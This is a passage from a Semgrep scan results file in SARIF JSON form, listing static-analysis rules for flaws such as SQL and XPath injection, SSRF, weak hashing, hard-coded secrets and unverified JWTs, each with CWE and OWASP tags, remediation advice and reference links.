Per OWASP guidance, 210K iterations should be used with SHA512"},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512","id":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512","name":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512","properties":{"precision":"very-high","tags":["CWE-916: Use of Password Hash With Insufficient Computational Effort","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Function sweepToken is allowed to be called by anyone"},"help":{"markdown":"Function sweepToken is allowed to be called by anyone\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted)\n - [https://medium.com/chainsecurity/trueusd-compound-vulnerability-bc5b696d29e2](https://medium.com/chainsecurity/trueusd-compound-vulnerability-bc5b696d29e2)\n - [https://chainsecurity.com/security-audit/compound-ctoken/](https://chainsecurity.com/security-audit/compound-ctoken/)\n - [https://blog.openzeppelin.com/compound-comprehensive-protocol-audit/](https://blog.openzeppelin.com/compound-comprehensive-protocol-audit/)\n - [https://etherscan.io/address/0xa035b9e130f2b1aedc733eefb1c67ba4c503491f](https://etherscan.io/address/0xa035b9e130f2b1aedc733eefb1c67ba4c503491f)\n","text":"Function sweepToken is allowed to be called by anyone"},"helpUri":"https://semgrep.dev/r/solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted","id":"solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted","name":"solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"help":{"markdown":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.xpath.tainted-xpath.tainted-xpath)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"helpUri":"https://semgrep.dev/r/java.spring.xpath.tainted-xpath.tainted-xpath","id":"java.spring.xpath.tainted-xpath.tainted-xpath","name":"java.spring.xpath.tainted-xpath.tainted-xpath","properties":{"precision":"very-high","tags":["CWE-643: Improper Neutralization of Data within XPath Expressions ('XPath Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.xpath.tainted-xpath.tainted-xpath"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi)\n - [https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text](https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"helpUri":"https://semgrep.dev/r/python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi","id":"python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi","name":"python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep)\n - [https://cwe.mitre.org/data/definitions/918.html](https://cwe.mitre.org/data/definitions/918.html)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/)\n - [https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric](https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep","id":"java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep","name":"java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"You should probably use Filename.get_temp_dirname()."},"help":{"markdown":"You should probably use Filename.get_temp_dirname().\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ocaml.lang.portability.slash-tmp.not-portable-tmp-string)\n","text":"You should probably use Filename.get_temp_dirname()."},"helpUri":"https://semgrep.dev/r/ocaml.lang.portability.slash-tmp.not-portable-tmp-string","id":"ocaml.lang.portability.slash-tmp.not-portable-tmp-string","name":"ocaml.lang.portability.slash-tmp.not-portable-tmp-string","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: ocaml.lang.portability.slash-tmp.not-portable-tmp-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims."},"help":{"markdown":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims."},"helpUri":"https://semgrep.dev/r/ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify","id":"ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify","name":"ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify","properties":{"precision":"very-high","tags":["CWE-345: Insufficient Verification of Data Authenticity","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found an insecure gRPC connection. This creates a connection without encryption to a gRPC client/server. A malicious attacker could tamper with the gRPC message, which could compromise the machine."},"help":{"markdown":"Found an insecure gRPC connection. This creates a connection without encryption to a gRPC client/server. A malicious attacker could tamper with the gRPC message, which could compromise the machine.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection)\n - [https://blog.gopheracademy.com/advent-2017/go-grpc-beyond-basics/#:~:text=disables%20transport%20security](https://blog.gopheracademy.com/advent-2017/go-grpc-beyond-basics/#:~:text=disables%20transport%20security)\n","text":"Found an insecure gRPC connection. This creates a connection without encryption to a gRPC client/server. A malicious attacker could tamper with the gRPC message, which could compromise the machine."},"helpUri":"https://semgrep.dev/r/javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection","id":"javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection","name":"javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This location block contains a 'proxy_pass' directive but does not contain the 'internal' directive. The 'internal' directive restricts access to this location to internal requests. Without 'internal', an attacker could use your server for server-side request forgeries (SSRF). Include the 'internal' directive in this block to limit exposure."},"help":{"markdown":"This location block contains a 'proxy_pass' directive but does not contain the 'internal' directive. The 'internal' directive restricts access to this location to internal requests. Without 'internal', an attacker could use your server for server-side request forgeries (SSRF). Include the 'internal' directive in this block to limit exposure.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.missing-internal.missing-internal)\n - [https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md](https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md)\n - [https://nginx.org/en/docs/http/ngx_http_core_module.html#internal](https://nginx.org/en/docs/http/ngx_http_core_module.html#internal)\n","text":"This location block contains a 'proxy_pass' directive but does not contain the 'internal' directive. The 'internal' directive restricts access to this location to internal requests. Without 'internal', an attacker could use your server for server-side request forgeries (SSRF). Include the 'internal' directive in this block to limit exposure."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.missing-internal.missing-internal","id":"generic.nginx.security.missing-internal.missing-internal","name":"generic.nginx.security.missing-internal.missing-internal","properties":{"precision":"very-high","tags":["CWE-16: CWE CATEGORY: Configuration","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.missing-internal.missing-internal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for cases where java applications are allowing unsafe renegotiation. This leaves the application vulnerable to a man-in-the-middle attack where chosen plain text is injected as prefix to a TLS connection."},"help":{"markdown":"Checks for cases where java applications are allowing unsafe renegotiation. This leaves the application vulnerable to a man-in-the-middle attack where chosen plain text is injected as prefix to a TLS connection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation)\n - [https://www.oracle.com/java/technologies/javase/tlsreadme.html](https://www.oracle.com/java/technologies/javase/tlsreadme.html)\n","text":"Checks for cases where java applications are allowing unsafe renegotiation. This leaves the application vulnerable to a man-in-the-middle attack where chosen plain text is injected as prefix to a TLS connection."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation","id":"problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation","name":"problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret","id":"csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret","name":"csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context' instead."},"help":{"markdown":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.unverified-ssl-context.unverified-ssl-context)\n - [https://docs.python.org/3/library/ssl.html#ssl-security](https://docs.python.org/3/library/ssl.html#ssl-security)\n - [https://docs.python.org/3/library/http.client.html#http.client.HTTPSConnection](https://docs.python.org/3/library/http.client.html#http.client.HTTPSConnection)\n","text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.unverified-ssl-context.unverified-ssl-context","id":"python.lang.security.unverified-ssl-context.unverified-ssl-context","name":"python.lang.security.unverified-ssl-context.unverified-ssl-context","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.unverified-ssl-context.unverified-ssl-context"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.actix.sql.postgres-taint.postgres-taint)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.actix.sql.postgres-taint.postgres-taint","id":"rust.actix.sql.postgres-taint.postgres-taint","name":"rust.actix.sql.postgres-taint.postgres-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.actix.sql.postgres-taint.postgres-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The call to 'createDecipheriv' with the Galois Counter Mode (GCM) mode of operation is missing an expected authentication tag length. If the expected authentication tag length is not specified or otherwise checked, the application might be tricked into verifying a shorter-than-expected authentication tag. This can be abused by an attacker to spoof ciphertexts or recover the implicit authentication key of GCM, allowing arbitrary forgeries."},"help":{"markdown":"The call to 'createDecipheriv' with the Galois Counter Mode (GCM) mode of operation is missing an expected authentication tag length. If the expected authentication tag length is not specified or otherwise checked, the application might be tricked into verifying a shorter-than-expected authentication tag. This can be abused by an attacker to spoof ciphertexts or recover the implicit authentication key of GCM, allowing arbitrary forgeries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length)\n - [https://www.securesystems.de/blog/forging_ciphertexts_under_Galois_Counter_Mode_for_the_Node_js_crypto_module/](https://www.securesystems.de/blog/forging_ciphertexts_under_Galois_Counter_Mode_for_the_Node_js_crypto_module/)\n - [https://nodejs.org/api/crypto.html#cryptocreatedecipherivalgorithm-key-iv-options](https://nodejs.org/api/crypto.html#cryptocreatedecipherivalgorithm-key-iv-options)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures/](https://owasp.org/Top10/A02_2021-Cryptographic_Failures/)\n","text":"The call to 'createDecipheriv' with the Galois Counter Mode (GCM) mode of operation is missing an expected authentication tag length. If the expected authentication tag length is not specified or otherwise checked, the application might be tricked into verifying a shorter-than-expected authentication tag. This can be abused by an attacker to spoof ciphertexts or recover the implicit authentication key of GCM, allowing arbitrary forgeries."},"helpUri":"https://semgrep.dev/r/javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length","id":"javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length","name":"javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length","properties":{"precision":"very-high","tags":["CWE-310: CWE CATEGORY: Cryptographic Issues","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use HMAC instead."},"help":{"markdown":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use HMAC instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use HMAC instead."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils","id":"java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils","name":"java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret","id":"go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret","name":"go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"$POOL.get_virtual_price() call on a Curve pool is not protected from the read-only reentrancy."},"help":{"markdown":"$POOL.get_virtual_price() call on a Curve pool is not protected from the read-only reentrancy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy)\n - [https://chainsecurity.com/heartbreaks-curve-lp-oracles/](https://chainsecurity.com/heartbreaks-curve-lp-oracles/)\n - [https://chainsecurity.com/curve-lp-oracle-manipulation-post-mortem/](https://chainsecurity.com/curve-lp-oracle-manipulation-post-mortem/)\n","text":"$POOL.get_virtual_price() call on a Curve pool is not protected from the read-only reentrancy."},"helpUri":"https://semgrep.dev/r/solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy","id":"solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy","name":"solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke, the potential exists for the attacker to create control flow paths through the application that were not intended by the application developers. This attack vector may allow the attacker to bypass authentication or access control checks or otherwise cause the application to behave in an unexpected manner."},"help":{"markdown":"If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke, the potential exists for the attacker to create control flow paths through the application that were not intended by the application developers. This attack vector may allow the attacker to bypass authentication or access control checks or otherwise cause the application to behave in an unexpected manner.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.unsafe-reflection.unsafe-reflection)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke, the potential exists for the attacker to create control flow paths through the application that were not intended by the application developers. This attack vector may allow the attacker to bypass authentication or access control checks or otherwise cause the application to behave in an unexpected manner."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.unsafe-reflection.unsafe-reflection","id":"java.lang.security.audit.unsafe-reflection.unsafe-reflection","name":"java.lang.security.audit.unsafe-reflection.unsafe-reflection","properties":{"precision":"very-high","tags":["CWE-470: Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.unsafe-reflection.unsafe-reflection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"$sceDelegateProvider allowlisting can introduce security issues if wildcards are used."},"help":{"markdown":"$sceDelegateProvider allowlisting can introduce security issues if wildcards are used.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading)\n - [https://docs.angularjs.org/api/ng/service/$sce#trustAsJs](https://docs.angularjs.org/api/ng/service/$sce#trustAsJs)\n - [https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf](https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf)\n","text":"$sceDelegateProvider allowlisting can introduce security issues if wildcards are used."},"helpUri":"https://semgrep.dev/r/javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading","id":"javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading","name":"javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Possible path traversal through `tarfile.open($PATH).extractall()` if the source tar is controlled by an attacker"},"help":{"markdown":"Possible path traversal through `tarfile.open($PATH).extractall()` if the source tar is controlled by an attacker\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal)\n - [https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall](https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall)\n","text":"Possible path traversal through `tarfile.open($PATH).extractall()` if the source tar is controlled by an attacker"},"helpUri":"https://semgrep.dev/r/trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal","id":"trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal","name":"trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure EFS filesystem is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and 